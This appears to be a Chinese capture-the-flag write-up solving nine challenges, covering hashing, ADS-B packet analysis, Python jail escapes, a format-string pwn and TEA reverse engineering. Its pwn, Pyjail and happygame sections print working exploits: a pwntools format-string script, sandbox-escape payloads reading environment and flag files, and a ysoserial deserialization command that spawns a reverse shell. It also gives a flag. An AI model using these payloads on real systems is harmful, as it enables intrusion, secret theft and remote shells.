一.SpeedUp
在这个网站直接记载了2的27次方的阶乘的每一位数字之和
对4495662081取个sha256即可
flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}
二.谍影重重2.0
将数据包导出为json格式
使用脚本提取字段并进行MD5
import json
import pyModeS as pms
import hashlib
with open('123.json', 'r', encoding='utf-8') as file:
data = json.load(file)
info = []
for packet in data:
if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:
tcp_layer = packet['_source']['layers']['tcp']
if 'tcp.payload' in tcp_layer:
tcp_payload = tcp_layer['tcp.payload'].replace(':','')
info.append(tcp_payload)
planes_data = []
for i in info:
msg = i[18:]
if pms.adsb.typecode(msg) >= 19 and pms.adsb.typecode(msg) <= 22:
icao = pms.adsb.icao(msg)
velocity_info = pms.adsb.velocity(msg)
speed, track, vertical_rate, _ = velocity_info
plane_info = {"icao": icao, "speed": speed, "track": track, "vertical_rate": vertical_rate}
planes_data.append(plane_info)
fastest_plane = max(planes_data, key=lambda x: x['speed'])
print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest())
请无视报错,pycharm被我搞得有点坏
三.Pyjail ! It's myFILTER !!!
使用nc连接,发现有很多代码
审计发现漏洞-非预期读环境变量
使用payload
{print(open("/proc/1/environ").read())}
四.Ez_fmt
脚本如下
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ez_fmt')
p = remote('ip', port)
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))
one_gadget=libc_base+0xe3b01
p.recvuntil("\n")
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%10$hn'+b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget&0xffff)).encode()+b'c%11$hn').ljust(0x20,b'\x00')+p64(stack+0x68)+p64(stack+0x68+2)
p.send(pay)
p.interactive()
五.babyre
发现有tls反调试
#include <stdio.h>
#include <stdint.h>
void jiemi(uint32_t v[2], uint32_t const key[4]) {
unsigned int i,j;
uint32_t v0=v[0], v1=v[1], delta=0x88408067, sum=0xd192c263;
for(i=0;i<4;i++) {
for (j=0; j<33; j++) {
sum -= delta;
v1 -= (((v0 << 5) ^ (v0 >> 4)) + v0) ^ (sum + key[(sum>>11) & 3]);
v0 -= (((v1 << 5) ^ (v1 >> 4)) + v1) ^ (sum + key[sum & 3]) ^sum;
}
}
v[0]=v0; v[1]=v1;
}
int main()
{
uint32_t array[8] = {0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};
uint32_t key[4]={0x62, 0x6F, 0x6D, 0x62};
for (int i = 0; i < 8; i += 2) {
uint32_t temp[2];
temp[0] = array[i];
temp[1] = array[i + 1];
jiemi(temp, key);
printf("%c%c%c%c%c%c%c%c",
(char)(temp[0] >> 0), (char)(temp[0] >> 8), (char)(temp[0] >> 16), (char)(temp[0] >> 24),
(char)(temp[1] >> 0), (char)(temp[1] >> 8), (char)(temp[1] >> 16), (char)(temp[1] >> 24));
}
return 0;
}
六.Pyjail ! It's myRevenge
使用nc连接,依次进行如下操作
{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#
{globals().update(dict(len=lambda x:0))}''{in''put()}'#
{print("".__class__.__mro__[1].__subclasses__()[137].__init__.__globals__["__builtins__"]["__import__"]("os").listdir())}
['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']{globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'#
{globals(). update(dict(len=lambda x:0))}''{in' 'put()}'#
{print (open("flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104"). read())}
七.石头剪刀布
按照如下顺序即可获胜
0000011220120220110111222010022012110021012012202100112022100112110020110220210201
八.happygame
使用ysoserial-all.jar工具
java -jar ysoserial-all.jar CommonsCollections5 'bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}'|base64
其中xxxx为反弹shell的base64编码
可以使用在线网站生成反弹shell的指令
打开postman,使用grpc协议,填写ip,端口,选择ProcessMsg接口
invoke之后即可反弹shell
九.调查问卷
不用多说了吧